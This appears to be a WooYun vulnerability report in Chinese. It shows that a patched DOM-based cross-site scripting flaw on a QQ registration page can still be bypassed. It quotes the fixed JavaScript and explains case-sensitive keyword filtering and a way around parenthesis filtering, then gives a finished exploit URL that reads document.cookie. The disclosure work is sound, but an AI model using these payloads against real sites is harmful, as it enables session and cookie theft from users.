WooYun.org

上次提交漏洞 http://wooyun.org/bugs/wooyun-2014-078950
a标签中可控的href值使用javascript伪协议经过点击触发执行
经过修复：

var sid = location.href,
    regDomain, regSid;
sid = sid.replace(/^http\S+=(\S+)&domain=(\S+)$/i, '');
regSid = RegExp.$1.replace(/["'<>\(\)]/g, "");
regDomain = RegExp.$2.replace(/["'<>\(\)]/g, "");
regDomain = regDomain.replace("javascript", "");
document.write('<a href="javascript:void(0);" onclick=cancel() ' + ' class=\"reg_cancel\">取消</a>');
function cancel() {
    window.location.href = regDomain + "/cgi-bin/setting4?fun=list&acc=1&sid=" + regSid + '\"';
}

取消按钮修改为通过js动态生成，并且对特殊符号进行了过滤
regDomain = regDomain.replace("javascript", "");
String.prototype.replace()
第一个参数如果是字符串类型，是对大小写敏感的，使用大写的JAVASCRIPT即可绕过
regDomain = RegExp.$2.replace(/["'<>\(\)]/g, "");
此处的$2代表的是url中domain=后面的值直到末尾，并且删除了 ' " < > ( )
过滤了圆括号这给执行js方法带来了很大的不便
在dom中的js环境里可以使用throw完美解决
<img src="x" onerror="javascript:window.onerror=eval;throw'=alert\x281\x29';">
但是执行js则会报错
使用大写的JAVASCRIPT:可以执行js后可以把两个圆括号放进url的注释部分
#()
然后通过localtion.hash[1]来访问
最终构造url：
http://zc.qq.com/iframe/2/reg.html?sid=_&domain=Javascript:h=location.hash;location.href=/Javascript:alert/.source+h[1]+/document.cookie/.source+h[2]//#()